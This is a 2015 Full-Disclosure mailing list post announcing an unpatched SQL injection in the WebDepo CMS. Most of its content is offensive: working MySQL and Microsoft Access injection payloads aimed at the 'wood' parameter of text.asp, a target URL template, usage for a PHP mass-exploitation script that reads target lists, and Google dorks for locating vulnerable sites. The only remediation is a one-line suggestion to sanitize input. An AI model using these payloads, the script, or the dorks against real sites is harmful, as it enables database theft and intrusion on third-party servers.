| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CANogS9jsAfdOabHtbZrMfesj+TbU1N=aZ-9C7o4Y6w=JUsbfJw@mail.gmail.com>
Date: Sat, 28 Mar 2015 02:16:38 -0300
From: INURL Brasil <inurlbr@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] (0DAY) WebDepo -SQL injection / INURL BRASIL
Advisory: SQLi-vulnerabilities in aplication CMS WebDepo
Affected aplication web: Aplication CMS WebDepo (Release date: 28/03/2014)
Vendor URL: http://www.webdepot.co.il
Vendor Status: 0day
==========================
Vulnerability Description:
==========================
Records and client practice management application
CMS WebDepo suffers from multiple SQL injection vulnerabilitie
==========================
Technical Details:
==========================
SQL can be injected in the following GET
GET VULN: wood=(id)
$wood=intval($_REQUEST['wood'])
==========================
SQL injection vulnerabilities
==========================
Injection is possible through the file text.asp
Exploit-Example:
DBMS: 'MySQL'
Exploit: +AND+(SELECT 8880 FROM(SELECT
COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE
WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
DBMS: 'Microsoft Access'
Exploit:
+UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
FROM MSysAccessObjects%16
Ex: http://target.us/text.asp?wood=(id)+Exploit
==========================
SCRIPT EXPLOIT
==========================
http://pastebin.com/b6bWuw7k
--help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php WebDepoxpl.php -t target
php WebDepoxpl.php -f targets.txt
php WebDepoxpl.php -t target -p 'http://localhost:9090'
howto: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html
==========================
GOOGLE DORK
==========================
inurl:"text.asp?wood="
site:il inurl:"text.asp?wood="
site:com inurl:"text.asp?wood="
==========================
Solution:
==========================
Sanitizing all requests coming from the client
==========================
Credits:
==========================
AUTOR: Cleiton Pinheiro / Nick: googleINURL
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/googleinurl
Fanpage: https://fb.com/InurlBrasil
Pastebin http://pastebin.com/u/Googleinurl
GIT: https://github.com/googleinurl
PSS: http://packetstormsecurity.com/user/googleinurl
YOUTUBE: http://youtube.com/c/INURLBrasil
PLUS: http://google.com/+INURLBrasil
==========================
References:
==========================
[1] http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html
[2] https://msdn.microsoft.com/en-us/library/ff648339.aspx
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists